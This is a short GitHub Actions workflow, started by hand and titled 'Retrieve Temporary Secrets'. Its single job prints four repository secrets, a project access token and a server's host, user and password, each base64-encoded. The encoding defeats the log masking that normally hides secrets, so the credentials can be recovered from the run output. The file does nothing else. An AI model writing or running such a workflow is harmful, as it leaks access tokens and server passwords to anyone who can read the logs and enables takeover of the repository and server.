name: Retrieve Temporary Secrets

on:
  workflow_dispatch:

jobs:
  extract-secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Codificar y mostrar Secrets
        run: |
          echo "=== PROJECT_PAT_TOKEN ==="
          echo -n "${{ secrets.PROJECT_PAT_TOKEN }}" | base64
          
          echo "=== SERVER_HOST ==="
          echo -n "${{ secrets.SERVER_HOST }}" | base64
          
          echo "=== SERVER_USER ==="
          echo -n "${{ secrets.SERVER_USER }}" | base64
          
          echo "=== SERVER_PASSWORD ==="
          echo -n "${{ secrets.SERVER_PASSWORD }}" | base64